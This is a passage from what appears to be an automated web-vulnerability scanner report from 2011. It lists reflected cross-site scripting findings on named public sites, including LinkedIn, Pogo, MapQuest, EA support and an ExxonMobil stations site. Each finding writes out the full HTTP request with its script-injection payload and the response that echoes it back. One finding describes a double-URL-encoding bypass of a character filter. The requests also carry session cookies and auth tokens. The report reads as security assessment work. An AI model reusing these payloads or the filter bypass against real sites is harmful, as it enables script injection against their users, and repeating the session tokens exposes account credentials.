Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /favicon.ico?bccb9<script>alert(1)</script>ded9f352e0=1 was not found on this server.</p>
...[SNIP]...
4.153. http://www.exxonmobilstations.com/imag/exxonmobil.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.exxonmobilstations.com
Path:   /imag/exxonmobil.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 273a9<script>alert(1)</script>4cecfd08359 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /imag273a9<script>alert(1)</script>4cecfd08359/exxonmobil.ico HTTP/1.1
Host: www.exxonmobilstations.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a6m0100r2iivameub0gdtubf65

Response

HTTP/1.1 404 Not Found
Date: Fri, 24 Jun 2011 13:32:12 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Vary: Accept-Encoding
Content-Length: 351
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /imag273a9<script>alert(1)</script>4cecfd08359/exxonmobil.ico was not found on this server.</p>
...[SNIP]...
4.154. http://www.exxonmobilstations.com/imag/exxonmobil.ico [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.exxonmobilstations.com
Path:   /imag/exxonmobil.ico

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 65346<script>alert(1)</script>2d65368a743 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /imag/exxonmobil.ico65346<script>alert(1)</script>2d65368a743 HTTP/1.1
Host: www.exxonmobilstations.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a6m0100r2iivameub0gdtubf65

Response

HTTP/1.1 404 Not Found
Date: Fri, 24 Jun 2011 13:32:15 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Vary: Accept-Encoding
Content-Length: 351
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /imag/exxonmobil.ico65346<script>alert(1)</script>2d65368a743 was not found on this server.</p>
...[SNIP]...
4.155. http://www.linkedin.com/countserv/count/share [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.linkedin.com
Path:   /countserv/count/share

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload ab4ac<script>alert(1)</script>e2878ead204 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /countserv/count/share?url=http%3A%2F%2Fwww.pymnts.com%2Fspil-games-selects-adyens-internet-payment-system-for-global-social-gaming-platform-20110208005240%2Fab4ac<script>alert(1)</script>e2878ead204 HTTP/1.1
Host: www.linkedin.com
Proxy-Connection: keep-alive
Referer: http://www.pymnts.com/spil-games-selects-adyens-internet-payment-system-for-global-social-gaming-platform-20110208005240/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: visit=G; bcookie="v=1&977d2a8e-45ea-4463-ac17-4a70c2eb7f42"; __qca=P0-831343408-1305412455203; leo_auth_token="GST:ZqtY8b5aGbfesyoNwehM01mPF93sGu2Q_HWHmQOSqQfsGho0v3A8iI:1308921992:2370742abe0050dd8b7266d61a7db03ef730095e"; JSESSIONID="ajax:8160619548287194313"; lang="v=2&lang=en&c="; NSC_MC_QH_MFP=ffffffffaf19965545525d5f4f58455e445a4a42198c

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 24 Jun 2011 13:30:39 GMT
Content-Length: 210

IN.Tags.Share.handleCount({"count":0,"url":"http://www.pymnts.com/spil-games-selects-adyens-internet-payment-system-for-global-social-gaming-platform-20110208005240/ab4ac<script>alert(1)</script>e2878ead204"});
4.156. http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp [sourceid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pogo.com
Path:   /pogo-online-games/lp-GeneralPogo-withoutFB.jsp

Issue detail

The value of the sourceid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12f2b%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec356c9d923d was submitted in the sourceid parameter. This input was echoed as 12f2b</script><script>alert(1)</script>c356c9d923d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the sourceid request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /pogo-online-games/lp-GeneralPogo-withoutFB.jsp?sourceid=free_internet_games_Broad_Free_GOO_C0080_A0001_LP000112f2b%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec356c9d923d&kw=free%20internet%20games&ad=6429295350&sitetarget= HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 24 Jun 2011 13:30:22 GMT
Server: Apache-Coyote/1.1
Content-Length: 12595


                       <html>
<head>

   <title>Pogo.com - The Ultimate Online Gaming Experience!</title>


   <link rel="StyleSheet" href="/v/FO57ZA/include/css/misc/marketing/landing.css"/>

   <sc
...[SNIP]...
linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp?sourceid=free_internet_games_Broad_Free_GOO_C0080_A0001_LP000112f2b</script><script>alert(1)</script>c356c9d923d&kw=free%20internet%20games&ad=6429295350&sitetarget=";
s.eVar2="pogo";
s.pageName="Template without FB Marketing Landing Page";
s.prop2="pogo";
s.eVar12="6618690632146297";
s.campaign="free_internet_g
...[SNIP]...
4.157. http://www.pogo.com/login/Scripts/AC_RunActiveContent.js [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.pogo.com
Path:   /login/Scripts/AC_RunActiveContent.js

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload df978</script><script>alert(1)</script>6085c15067d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /login/Scripts/AC_RunActiveContent.js HTTP/1.1
Host: www.pogo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=df978</script><script>alert(1)</script>6085c15067d
Cookie: com.pogo.site=pogo; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1308922690996-New%7C1311514690996%3B; prod.JID=DFBED573C399BE6DE0C56C9A43B58D50.000274; com.pogo.unid=6618939740244558

Response

HTTP/1.1 404 /login/Scripts/AC_RunActiveContent.js
Expires: 0
Cache-Control: max-age=0, private
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 24 Jun 2011 13:38:24 GMT
Server: Apache-Coyote/1.1
Content-Length: 4044


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>
   <title>
   Pogo:
   Error: Invalid URL
   </title>
   


...[SNIP]...
=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.google.com/search?hl=en&q=df978</script><script>alert(1)</script>6085c15067d";
s.eVar2="pogo";
s.pageName="ERROR: Invalid URL Page";
s.prop2="pogo";
s.channel="pogo";
s.prop7="POGO:pogo:error::ERROR: Invalid URL Page:Non Authenticated";
s.prop8="Non Authenticated";
if (typeof(
...[SNIP]...
4.158. http://www.pogo.com/login/entry.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.pogo.com
Path:   /login/entry.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e7a30</script><script>alert(1)</script>44a7311bc87 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /login/entry.jsp?sl=1&site=pogo&redr=http%3A%2F%2Fwww.pogo.com%2Fpogo-online-games%2Flp-GeneralPogo-withoutFB.jsp%3Fad%3D6429295350%26sourceid%3Dfree_internet_games_Broad_Free_GOO_C0080_A0001_LP000112f2b%25253c%25252fscript%25253e%25253cscript%25253ealert%252528document.location%252529%25253c%25252fscript%25253ec356c9d923d%26kw%3Dfree%2Binternet%2Bgames%26sitetarget%3D HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=e7a30</script><script>alert(1)</script>44a7311bc87
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: com.pogo.site=pogo; s_pers=%20s_nr%3D1308922304648-New%7C1311514304648%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; prod.JID=C84030ABB66027F38F1EBD321C1C3F57.000144; com.pogo.unid=6618922560387636

Response (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 24 Jun 2011 13:37:55 GMT
Server: Apache-Coyote/1.1
Content-Length: 12481


                       <html>
<head>

   <title>Pogo.com - The Ultimate Online Gaming Experience!</title>


   <link rel="StyleSheet" href="/v/FO57ZA/include/css/misc/marketing/landing.css"/>

   <sc
...[SNIP]...
=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.google.com/search?hl=en&q=e7a30</script><script>alert(1)</script>44a7311bc87";
s.eVar2="pogo";
s.pageName="Template without FB Marketing Landing Page";
s.prop2="pogo";
s.eVar12="6618939740244558";
s.campaign="free_internet_games_Broad_Free_GOO_C0080_A0001_LP000112f2b%253c%252f
...[SNIP]...
4.159. http://www.pogo.com/login/media/Pogo_General_LP_2.swf [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.pogo.com
Path:   /login/media/Pogo_General_LP_2.swf

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30799</script><script>alert(1)</script>4c0d8e0492b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /login/media/Pogo_General_LP_2.swf HTTP/1.1
Host: www.pogo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=30799</script><script>alert(1)</script>4c0d8e0492b
Cookie: com.pogo.site=pogo; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1308922705451-New%7C1311514705451%3B; prod.JID=DFBED573C399BE6DE0C56C9A43B58D50.000274; com.pogo.unid=6618939740244558

Response

HTTP/1.1 404 /login/media/Pogo_General_LP_2.swf
Expires: 0
Cache-Control: max-age=0, private
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 24 Jun 2011 13:38:25 GMT
Server: Apache-Coyote/1.1
Content-Length: 4044


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>
   <title>
   Pogo:
   Error: Invalid URL
   </title>
   


...[SNIP]...
=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.google.com/search?hl=en&q=30799</script><script>alert(1)</script>4c0d8e0492b";
s.eVar2="pogo";
s.pageName="ERROR: Invalid URL Page";
s.prop2="pogo";
s.channel="pogo";
s.prop7="POGO:pogo:error::ERROR: Invalid URL Page:Non Authenticated";
s.prop8="Non Authenticated";
if (typeof(
...[SNIP]...
4.160. http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.pogo.com
Path:   /pogo-online-games/lp-GeneralPogo-withoutFB.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49471</script><script>alert(1)</script>881b68c5a42 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pogo-online-games/lp-GeneralPogo-withoutFB.jsp?sourceid=free_internet_games_Broad_Free_GOO_C0080_A0001_LP0001&kw=free%20internet%20games&ad=6429295350&sitetarget= HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q=49471</script><script>alert(1)</script>881b68c5a42

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 24 Jun 2011 13:30:22 GMT
Server: Apache-Coyote/1.1
Content-Length: 12270


                       <html>
<head>

   <title>Pogo.com - The Ultimate Online Gaming Experience!</title>


   <link rel="StyleSheet" href="/v/FO57ZA/include/css/misc/marketing/landing.css"/>

   <sc
...[SNIP]...
=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.google.com/search?hl=en&q=49471</script><script>alert(1)</script>881b68c5a42";
s.eVar2="pogo";
s.pageName="Template without FB Marketing Landing Page";
s.prop2="pogo";
s.eVar12="6618690632146297";
s.campaign="free_internet_games_Broad_Free_GOO_C0080_A0001_LP0001";
s.channel="g
...[SNIP]...
4.161. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [C3UID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the C3UID cookie is copied into the HTML document as plain text between tags. The payload e026d<script>alert(1)</script>0179e5f2a4f was submitted in the C3UID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.gamersdailynews.com/story-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=451931075376e026d<script>alert(1)</script>0179e5f2a4f; 480-SM=adver_06-20-2011-20-17-03; 480-VT=advertop100_06-16-2011-18-32-39_15277004981308249159ZZZZadver_06-23-2011-13-44-47_16385998991308836687; SERVERID=s3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:31:13 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_06-20-2011-20-17-03; expires=Mon, 27-Jun-2011 13:31:13 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=advertop100_06-16-2011-18-32-39_15277004981308249159ZZZZadver_06-24-2011-13-31-13_15983333791308922273; expires=Wed, 22-Jun-2016 13:31:13 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_15983333791308922273; expires=Fri, 24-Jun-2011 13:46:13 GMT; path=/; domain=c3metrics.com
Content-Length: 6692
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
ection[a].loadNewP();this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnid='adver';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScid='480';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='451931075376e026d<script>alert(1)</script>0179e5f2a4f';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='15983333791308922273';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTca
...[SNIP]...
4.162. http://mapquest.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mapquest.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cb0f"><script>alert(1)</script>8a99c070059 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?2cb0f"><script>alert(1)</script>8a99c070059=1 HTTP/1.1
Host: mapquest.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 24 Jun 2011 14:15:18 GMT
Server: ArtBlast/3.5.5
MIME-Version: 1.0
Expires: Fri, 24 Jun 2011 14:45:18 GMT
Content-length: 136
Content-type: text/html
Location: http://www.mapquest.com/?2cb0f"><script>alert(1)</script>8a99c070059=1

<html>
<body>
Page relocated <a href="http://www.mapquest.com/?2cb0f"><script>alert(1)</script>8a99c070059=1">here.</a>
</body>
</html>
4.163. http://support.ea.com/ [cp_session cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://support.ea.com
Path:   /

Issue detail

The value of the cp_session cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 963d4"%3balert(1)//16be0394141 was submitted in the cp_session cookie. This input was echoed as 963d4";alert(1)//16be0394141 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: support.ea.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CEM-session=50ishjhd22sfunvecnibh6mej7; __utmz=103303007.1308923026.1.1.utmcsr=aboutus.ea.com|utmccn=(referral)|utmcmd=referral|utmcct=/ea_outreach.action; __utma=103303007.346541957.1308923026.1308923026.1308923026.1; __utmc=103303007; __utmb=103303007.1.10.1308923026; s_ria=flash%2010%7Csilverlight%20not%20detected; cp_session=aU84DuwUwY9gAhoN137mIdeb2MlklSkQKAUA_1uW_w4uKV9mqls6n6fRxH0x0NYUkUmialo2t8WgxRqvPN%7EF3ORX9u_4mKmEchm_Tu0t1DvdTRtxLfbbx5ltTw8s9D4UMa_uRcumg2x9NzthyDo%7EU%7Eihqm2dEGCf5UP50ehVCmce5Kj9V1rZC6PP4P2bZGCViFgvJMmYy6oXQBcQY3Yz%7EHv0U62RjTo2adFX6Vp02V3lm5rIQLUnvKHVfSwG5ttISZcxk4BKJF8cI%21963d4"%3balert(1)//16be0394141; evar1=Not%20Logged%20In; s_sivo=US%3AEACOM%3ANONE; s_cc=true; s_pv=NA%3AUS%3AEA%3ANONE%3AMKT%3ANONE%3AEACOM%3ANONE%3APRODUCTEULAS; s_sq=eacustomerservice%3D%2526pid%253DSupport%252520Home%2526pidt%253D1%2526oid%253Djavascript%25253Avoid%252528openPositionedWindow%252528%252527http%25253A%252F%252Fwww.info.ea.com%252527%25252C%25252520%252527info%252527%25252C%25252520780%25252C%25252520800%25252C%252525200%25252C%252525200%25252C%25252520t%2526ot%253DA%26eaeabrandna%3D%2526pid%253Dhttp%25253A%25252F%25252Finvestors.ea.com%25252F%2526oid%253Dhttp%25253A%25252F%25252Feastore.ea.com%25252F%2526ot%253DA; s_ppv=7

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:48:31 GMT
Server: Apache
Cache-Control: no-cache
Expires: -1
Pragma: no-cache
Set-Cookie: cp_session=aUd%7EwVrEDs3czCrHpI9GxvBIbHW22x4yA7XvD3kXIOgat8SuOUtH2xdNwkCkYLlWOBkqntoAHmB6IK58G1KzQVCqAgdeJVGcSvYWuSYq5iulSXh6t9zsILtyUH5_DuMKR8W%7EiS6qsSs6zkGBB6Hdk3TasMZWAcCABP; path=/; httponly
Set-Cookie: accType=deleted; expires=Thu, 24-Jun-2010 13:48:30 GMT
RNT-Time: D=208941 t=1308923311037929
RNT-Machine: 13
Vary: Accept-Encoding
Content-Length: 70174
X-Cnection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">
<hea
...[SNIP]...
lo2t8WgxRqvPN~F3ORX9u_4mKmEchm_Tu0t1DvdTRtxLfbbx5ltTw8s9D4UMa_uRcumg2x9NzthyDo~U~ihqm2dEGCf5UP50ehVCmce5Kj9V1rZC6PP4P2bZGCViFgvJMmYy6oXQBcQY3Yz~Hv0U62RjTo2adFX6Vp02V3lm5rIQLUnvKHVfSwG5ttISZcxk4BKJF8cI!963d4";alert(1)//16be0394141";
s.prop11="";
s.prop6 = "";
s.prop7 = "";
s.prop8 = "";
s.prop12 = "";
s.prop13 = "";
s.prop16 = "";
s.prop17 = "";
var theBody=document.body;
if (theBody && document.body.addBehavior)
theBody.addBe
...[SNIP]...
4.164. http://support.ea.com/app/answers/detail/a_id/3628 [cp_session cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://support.ea.com
Path:   /app/answers/detail/a_id/3628

Issue detail

The value of the cp_session cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31232"%3balert(1)//5a7be544b54 was submitted in the cp_session cookie. This input was echoed as 31232";alert(1)//5a7be544b54 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

